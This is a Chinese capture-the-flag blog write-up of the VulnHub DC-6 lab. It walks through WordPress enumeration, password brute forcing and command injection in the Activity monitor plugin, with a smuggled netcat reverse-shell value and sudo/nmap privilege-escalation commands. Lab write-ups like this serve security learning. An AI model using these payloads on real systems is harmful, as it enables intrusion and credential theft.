VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)

靶机来源:https://www.vulnhub.com/entry/dc-6,315/

1.扫描(arp-scan和nmap)

可以看到靶机开放了两个端口分别是22和80
在这里插入图片描述

2.打开浏览器浏览靶机网页

发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。
在这里插入图片描述
所以打开hosts文件绑定靶机IP:
路径为/etc/hosts
在这里插入图片描述
修改为:
<靶机IP> wordy
在这里插入图片描述
再次打开浏览器访问就可以访问成功了:
发现这个网页使用的是非常经典的WordPress模板,接下来就可以针对网页使用的这个模板进行渗透。
在这里插入图片描述
这里得到的信息,可能会是从插件入手:
在这里插入图片描述

3.Dirb爆破网站路径

dirb http://wordy/

在这里插入图片描述
发现网站后台登陆界面:http://wordy/wp-admin/
在这里插入图片描述

4.wpscan爆破网站用户名

wpscan --url http://wordy/ -e u

在这里插入图片描述
得到了五个用户:

admin
graham
mark
sarah
jens

现在是想办法登录进网站后台,可以采用爆破的方式进入,并且得到了作者的一条提示:
在这里插入图片描述
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt,在命令行中输入在/root目录下得到了一个关键词为k01的密码字典:
在这里插入图片描述
将刚刚wpscan爆破出的用户名写进一个名为username的文本文件,作为另一个交互式字典:
在这里插入图片描述

5.burp抓包,进行密码爆破

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
设置到之后attack开始爆破,可能会非常慢,打个一两把游戏回来看结果,正确的密码的字长会跟错误的字长不一样,可以这样判断出正确的登录密码,但是这个burp爆破实在太慢了,不好使。
不想打游戏就可以使用wpscan进行爆破,很快,参数要注意:-U <用户名字典> -P <密码字典>

wpscan --url http://wordy -U /root/username.txt -P /root/passwords.txt

在这里插入图片描述
爆破得到用户名为mark,和密码为helpdesk01的后台用户
登录进去:
在这里插入图片描述

6.Activity monitor远程命令执行漏洞利用

发现一个插件Activity monitor,通过网上查询了一下这个插件的漏洞,好像存在远程命令执行漏洞,详细见这篇博文。于是,转到这个插件的界面,在IP tools中输入127.0.0.1,并点击lookup,同时使用burp进行抓包:

在这里插入图片描述
在这里插入图片描述
发送到repeator模块中进行重放:
在这里插入图片描述
因为得知了这个插件存在命令执行漏洞,所以先试一试简单的命令能不能执行:
在这里插入图片描述
发现漏洞的确存在,那么试试直接在这里给kali一个反弹shell,

127.0.0.1 | nc -e /bin/sh 192.168.65.128 8888

nc监听8888端口:

nc -lvp 8888

在这里插入图片描述
成功拿到反弹shell,获取一个交互式的shell:

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
先是查看每个wordpress模板都有的一个wp-config.php文件,查看有没有系统用户信息:
得到wpdbuser/meErKatZ,是一个数据库账户
在这里插入图片描述
用得到的这个账户登录数据库查看信息:

mysql -uwpdbuser -pmeErKatZ

在这里插入图片描述
在这里插入图片描述
可以看到五个账户密码都加密过了,无从下手。

随后在目录/home/mark/stuff中发现这了things-to-do.txt:
得到一个用户graham/Gso7issUM1D4
在这里插入图片描述
尝试用这个账号登录ssh服务:

ssh graham@192.168.65.135

在这里插入图片描述

7.提权

sudo -l查看提权信息:
提示我们jens用户文件下有一个脚本
在这里插入图片描述
查看这个脚本cat /home/jens/backups.sh
发现内容tar -czf backups.tar.gz /var/www/html
在这里插入图片描述

echo "/bin/bash" >>/home/jens/backups.sh

把/bin/bash写入到backups.sh后面:
在这里插入图片描述

cd /home/jens
sudo -u jens ./backups.sh

转到jens目录,执行backups.sh 脚本成功转换为jens用户:
在这里插入图片描述
发现jens用户可以无密码以root用户权限执行/usr/bin/nmap命令:
在这里插入图片描述

echo "os.execute('/bin/bash')" >> root1
sudo nmap --script=root1

这里我不太明白,参考了这篇博客

在这里插入图片描述
cat /root/theflag.txt
在这里插入图片描述

8.小结

这次的提权部分有点困难,做了比较久,而且不太理解

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值